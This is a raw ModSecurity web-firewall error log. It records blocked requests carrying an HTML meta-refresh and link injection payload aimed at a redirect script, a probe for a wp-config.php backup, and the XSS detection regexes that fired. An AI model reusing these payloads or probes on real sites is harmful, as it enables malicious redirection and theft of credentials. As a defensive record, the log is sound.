[Tue May 12 01:47:22.719124 2026] [security2:error] [pid 1730207:tid 1730217] [client 27.78.84.116:49209] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqijue9Sp-pIv_Bb5_1gAAAUg"]
[Tue May 12 01:47:22.719759 2026] [security2:error] [pid 1730207:tid 1730217] [client 27.78.84.116:49209] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqijue9Sp-pIv_Bb5_1gAAAUg"]
[Tue May 12 01:47:22.719935 2026] [security2:error] [pid 1730207:tid 1730217] [client 27.78.84.116:49209] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqijue9Sp-pIv_Bb5_1gAAAUg"]
[Tue May 12 01:47:22.720044 2026] [security2:error] [pid 1730207:tid 1730217] [client 27.78.84.116:49209] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [t [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqijue9Sp-pIv_Bb5_1gAAAUg"]
[Tue May 12 01:47:22.720243 2026] [security2:error] [pid 1730207:tid 1730217] [client 27.78.84.116:49209] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag " [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqijue9Sp-pIv_Bb5_1gAAAUg"]
[Tue May 12 01:47:22.720738 2026] [security2:error] [pid 1730207:tid 1730217] [client 27.78.84.116:49209] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqijue9Sp-pIv_Bb5_1gAAAUg"]
[Tue May 12 01:47:22.721070 2026] [security2:error] [pid 1730207:tid 1730217] [client 27.78.84.116:49209] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqijue9Sp-pIv_Bb5_1gAAAUg"]
[Tue May 12 01:47:23.602591 2026] [security2:error] [pid 1709071:tid 1709108] [client 27.78.84.116:49296] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqi7vMumyrWMfSu7qa6AAAANU"]
[Tue May 12 01:47:23.603573 2026] [security2:error] [pid 1709071:tid 1709108] [client 27.78.84.116:49296] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqi7vMumyrWMfSu7qa6AAAANU"]
[Tue May 12 01:47:23.603747 2026] [security2:error] [pid 1709071:tid 1709108] [client 27.78.84.116:49296] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqi7vMumyrWMfSu7qa6AAAANU"]
[Tue May 12 01:47:23.603846 2026] [security2:error] [pid 1709071:tid 1709108] [client 27.78.84.116:49296] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [t [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqi7vMumyrWMfSu7qa6AAAANU"]
[Tue May 12 01:47:23.604026 2026] [security2:error] [pid 1709071:tid 1709108] [client 27.78.84.116:49296] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag " [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqi7vMumyrWMfSu7qa6AAAANU"]
[Tue May 12 01:47:23.604489 2026] [security2:error] [pid 1709071:tid 1709108] [client 27.78.84.116:49296] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqi7vMumyrWMfSu7qa6AAAANU"]
[Tue May 12 01:47:23.604754 2026] [security2:error] [pid 1709071:tid 1709108] [client 27.78.84.116:49296] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqi7vMumyrWMfSu7qa6AAAANU"]
[Tue May 12 01:47:24.340931 2026] [security2:error] [pid 1730175:tid 1730184] [client 27.78.84.116:49387] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqjHo6NvB9WXx5V-5tywAAAQc"]
[Tue May 12 01:47:24.341525 2026] [security2:error] [pid 1730175:tid 1730184] [client 27.78.84.116:49387] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqjHo6NvB9WXx5V-5tywAAAQc"]
[Tue May 12 01:47:24.341700 2026] [security2:error] [pid 1730175:tid 1730184] [client 27.78.84.116:49387] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqjHo6NvB9WXx5V-5tywAAAQc"]
[Tue May 12 01:47:24.341807 2026] [security2:error] [pid 1730175:tid 1730184] [client 27.78.84.116:49387] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [t [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqjHo6NvB9WXx5V-5tywAAAQc"]
[Tue May 12 01:47:24.341991 2026] [security2:error] [pid 1730175:tid 1730184] [client 27.78.84.116:49387] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag " [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqjHo6NvB9WXx5V-5tywAAAQc"]
[Tue May 12 01:47:24.342508 2026] [security2:error] [pid 1730175:tid 1730184] [client 27.78.84.116:49387] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqjHo6NvB9WXx5V-5tywAAAQc"]
[Tue May 12 01:47:24.342899 2026] [security2:error] [pid 1730175:tid 1730184] [client 27.78.84.116:49387] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqjHo6NvB9WXx5V-5tywAAAQc"]
[Tue May 12 01:47:31.927191 2026] [security2:error] [pid 1695975:tid 1695990] [client 43.134.40.189:51528] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agJqk9VI9ymHBxup749-1AAAAIw"]
[Tue May 12 01:47:35.208396 2026] [security2:error] [pid 1691274:tid 1691490] [client 43.130.111.40:53796] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/informatique/realisations/conception-dun-compagnon-domotique-ia-etape-3-4/"] [unique_id "agJql1fdQaraX_prmqcPkwAAABU"]
[Tue May 12 01:48:14.110647 2026] [security2:error] [pid 1730207:tid 1730216] [client 172.212.217.10:63852] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "happy-baby-box.fr"] [uri "/wp-config.php.backup"] [unique_id "agJqvjue9Sp-pIv_Bb6AWgAAAUc"]
